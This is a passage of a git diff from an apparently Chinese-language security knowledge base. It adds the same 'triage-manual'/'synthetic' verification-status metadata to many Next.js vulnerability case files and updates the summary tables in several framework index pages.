Open Redirect in Next.js versions +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2020-15242` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md index 15ec65e5..63974721 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md @@ -8,6 +8,10 @@ updated_date: "2025-09-26T17:49:56Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -32,6 +36,15 @@ primary_source: "https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7 # Directory Traversal in Next.js +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2020-5284` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md index 7fc4c3f5..62988231 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md @@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:00:08.038285Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -32,6 +36,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-vxf5 # Open Redirect in Next.js +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2021-37699` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md index 789ac0fd..77fb7834 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md @@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:00:20.154452Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -32,6 +36,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-9gr3 # XSS in Image Optimization API for Next.js +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2021-39178` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md index d70a95f8..e897453c 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md @@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:00:36.554552Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-25mp # Unexpected server crash in Next.js. +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2021-43803` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md index 9034bc0f..7e45ea70 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:32:36.434669Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -32,6 +36,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-fr5h # Next.js Server-Side Request Forgery in Server Actions +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2024-34351` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md index 538a5f00..39688379 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:45:33.402195Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-gp8f # Next.js Cache Poisoning +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2024-46982` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md index 32228402..cd8f5f43 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:25:43.295558Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-g77x # Denial of Service condition in Next.js image optimization +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2024-47831` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md index c2eb5937..aa270f2d 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md @@ -8,6 +8,10 @@ updated_date: "2025-09-10T21:12:24Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc # Next.js authorization bypass vulnerability +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2024-51479` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md index e6522d1c..5d7b98ce 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:36:04.252972Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -35,6 +39,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-7m27 # Next.js Allows a Denial of Service (DoS) with Server Actions +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2024-56332` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md index 8f3d35f1..c37b5f3e 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md @@ -8,6 +8,10 @@ updated_date: "2026-03-04T15:06:29.993197Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -37,6 +41,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-f82v # Authorization Bypass in Next.js Middleware +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2025-29927` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md index 4ce20e8f..f3c74048 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md @@ -8,6 +8,10 @@ updated_date: "2025-10-13T15:35:50Z" severity: "medium" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -41,6 +45,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-223j # Next.js may leak x-middleware-subrequest-id to external hosts +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2025-30218` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md index 3c8e3eed..4084d786 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md @@ -8,6 +8,10 @@ updated_date: "2025-09-26T17:48:29Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-qpjv # Next.js Race Condition to Cache Poisoning +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2025-32421` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md index 254c27c5..9716ff0c 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md @@ -8,6 +8,10 @@ updated_date: "2025-06-13T14:41:21Z" severity: "medium" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-3h52 # Information exposure in Next.js dev server due to lack of origin verification +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2025-48068` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md index 2d9e2fe2..05e77301 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:37:18.974477Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-r2fc # Next.js has a Cache poisoning vulnerability due to omission of the Vary header +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2025-49005` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md index 81f657a9..3be5f0aa 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md @@ -8,6 +8,10 @@ updated_date: "2025-07-03T21:49:52Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-67rr # Next.JS vulnerability can lead to DoS via cache poisoning +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2025-49826` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md index 48170f73..6aba918b 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:35:34.538107Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-xv57 # Next.js Content Injection Vulnerability for Image Optimization +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2025-55173` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md index f103d5f2..d78cecaa 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:50:08.291668Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg # Next.js Affected by Cache Key Confusion for Image Optimization API Routes +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2025-57752` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md index c1de0e60..fc78e9a5 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:20:45.658010Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-4342 # Next.js Improper Middleware Redirect Handling Leads to SSRF +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2025-57822` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md index f4fe5f50..dcf1a4d1 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md @@ -8,6 +8,10 @@ updated_date: "2026-02-10T01:28:46.973023Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p # Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2025-59471` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md index 63dd0330..2533e598 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md @@ -8,6 +8,10 @@ updated_date: "2026-02-06T13:13:43.709252Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-5f7q # Next.js has Unbounded Memory Consumption via PPR Resume Endpoint +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--CVE-2025-59472` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md b/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md index 967dbc93..eeced904 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:46:38.768104Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -48,6 +52,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-5j59 # Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--GHSA-5j59-xgg2-r9c4` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md b/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md index 78d70a6b..f08492ee 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:45:15.823345Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -43,6 +47,15 @@ primary_source: "https://github.com/facebook/react/security/advisories/GHSA-fv66 # Next.js is vulnerable to RCE in React flight protocol +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--GHSA-9qr9-h5gf-34mp` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md b/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md index 3ac66565..cbbfee60 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md @@ -8,6 +8,10 @@ updated_date: "2026-02-13T00:43:52.836085Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -48,6 +52,15 @@ primary_source: "https://github.com/facebook/react/security/advisories/GHSA-83fc # Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--GHSA-h25m-26qc-wcjf` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md b/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md index 5fa88d4c..b8e7804a 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:55:54.855562Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -49,6 +53,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6 # Next Vulnerable to Denial of Service with Server Components +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--GHSA-mwv6-3258-q52c` diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md b/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md index 3cfda646..40dfc58f 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:51:40.627151Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -47,6 +51,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-w37m # Next Server Actions Source Code Exposure +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `nextjs--GHSA-w37m-7fhw-fmv9` diff --git a/07-framework-security/frameworks/nodejs/INDEX.md b/07-framework-security/frameworks/nodejs/INDEX.md index aab21001..17badfe1 100644 --- a/07-framework-security/frameworks/nodejs/INDEX.md +++ b/07-framework-security/frameworks/nodejs/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/nuxt/INDEX.md b/07-framework-security/frameworks/nuxt/INDEX.md index 0412570d..cf526c8e 100644 --- a/07-framework-security/frameworks/nuxt/INDEX.md +++ b/07-framework-security/frameworks/nuxt/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -26,6 +30,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/rails/INDEX.md b/07-framework-security/frameworks/rails/INDEX.md index fed6c0b1..f7caa7af 100644 --- a/07-framework-security/frameworks/rails/INDEX.md +++ b/07-framework-security/frameworks/rails/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/react/INDEX.md b/07-framework-security/frameworks/react/INDEX.md index 5146a0c2..3065c364 100644 --- a/07-framework-security/frameworks/react/INDEX.md +++ b/07-framework-security/frameworks/react/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -26,6 +30,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 